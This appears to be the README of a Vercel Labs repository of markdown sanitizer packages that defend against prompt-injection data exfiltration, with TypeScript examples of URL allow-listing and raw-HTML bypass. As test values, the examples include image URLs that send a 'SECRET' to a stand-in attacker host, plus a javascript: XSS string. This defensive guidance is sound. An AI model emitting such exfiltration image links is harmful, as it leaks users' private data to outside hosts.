vercel-labs/markdown-sanitizers

Markdown sanitizers

This repository contains 2 related npm packages concerned with hardening markdown against data exfiltration attacks through LLM prompt-injection.

The 2 packages address 2 different use cases:

  1. You render the markdown to HTML yourself
  2. You're giving the markdown to a third-party such as GitHub or GitLab where you don't control the rendering

1. You render the markdown to HTML yourself

This is the more common use-case. It's also the variant that is easier to secure, because you have full control over the process. harden-react-markdown is a wrapper for the popular react-markdown package giving it more secure defaults, and giving you the ability to allow-list URL prefixes in images and links.
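As a rough illustration of what allow-listing URL prefixes means, here is a minimal sketch in TypeScript. It is not the harden-react-markdown implementation or its API: the function name `isAllowedUrl`, its parameters, and the example hosts are all hypothetical, chosen only to show the idea of resolving a URL and comparing it against trusted prefixes.

```typescript
// Hypothetical helper for illustration only; NOT part of harden-react-markdown.
// Resolves a URL from untrusted markdown against a base origin, then checks
// whether the normalized result starts with one of the trusted prefixes.
function isAllowedUrl(
  rawUrl: string,
  allowedPrefixes: string[],
  baseOrigin: string
): boolean {
  let parsed: URL;
  try {
    // Resolving against a base handles relative URLs and normalizes "../" segments.
    parsed = new URL(rawUrl, baseOrigin);
  } catch {
    return false; // unparseable URLs are rejected
  }
  // Reject non-web schemes such as javascript: or data:
  if (parsed.protocol !== "https:" && parsed.protocol !== "http:") {
    return false;
  }
  const normalized = parsed.href;
  return allowedPrefixes.some((prefix) => normalized.startsWith(prefix));
}

// Assumed example values; the hosts are placeholders.
const trusted = ["https://cdn.example.com/img/", "https://app.example.com/"];
const base = "https://app.example.com";

isAllowedUrl("https://cdn.example.com/img/a.png", trusted, base); // true
isAllowedUrl("https://attacker.example/p.png?d=SECRET", trusted, base); // false
isAllowedUrl("javascript:alert(1)", trusted, base); // false
```

In a sketch like this, each prefix should end with `/`. A prefix such as `https://cdn.example.com` without the trailing slash would also match `https://cdn.example.com.attacker.example/`.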

2. You're giving the markdown to a third-party such as GitHub or GitLab where you don't control the rendering

We created markdown-to-markdown-sanitizer for this use-case. Generally speaking, this is less secure than sanitizing the final rendered output such as the generated HTML. Hence, this package should only be used when the markdown is rendered by a third-party such as GitHub or GitLab.

Security properties

The packages in this repository have subtle security properties. Use at your own risk (see LICENSE) and perform your own security testing for your specific application.

⚠️ Important: Use rehype-sanitize if using rehype-raw

If you use rehype-raw or any plugin that allows embedded raw HTML, you must pair it with a sanitizer such as [rehype-sanitize](https://github.com/rehypejs/rehype-sanitize).

While harden-react-markdown and related packages harden URLs inside markdown nodes, raw HTML injected via rehype-raw bypasses this layer — meaning untrusted HTML could still introduce data-exfiltration or XSS vectors.
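To make the bypass concrete, the sketch below uses a deliberately simplified stand-in for "inspecting markdown image nodes": a regular expression that only recognizes the `![alt](url)` syntax. This is an assumption made for illustration and not how harden-react-markdown or rehype-raw work internally. The function name `markdownImageUrls` and the attacker URL are hypothetical.

```typescript
// Simplified stand-in for walking markdown image nodes: it only sees the
// ![alt](url) syntax. Illustrative only; real parsers build a syntax tree.
function markdownImageUrls(markdown: string): string[] {
  const pattern = /!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)/g;
  const urls: string[] = [];
  let match: RegExpExecArray | null;
  while ((match = pattern.exec(markdown)) !== null) {
    urls.push(match[1]);
  }
  return urls;
}

// The same exfiltration URL, expressed two ways (placeholder host and payload).
const viaMarkdown = "![chart](https://attacker.example/p.png?d=SECRET)";
const viaRawHtml = '<img src="https://attacker.example/p.png?d=SECRET">';

markdownImageUrls(viaMarkdown); // ["https://attacker.example/p.png?d=SECRET"]
markdownImageUrls(viaRawHtml); // [] (the raw HTML image is invisible to this check)
```

A check that only inspects markdown-level links and images never sees the second form, which is why raw HTML needs its own sanitization step once it is parsed.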

Recommended setup:

import rehypeRaw from "rehype-raw";
import rehypeSanitize from "rehype-sanitize";

const plugins = [
  rehypeRaw,
  rehypeSanitize, // must come after rehype-raw
];

Always sanitize after parsing raw HTML.

🚫 Never assume LLM or user-generated markdown is safe by default.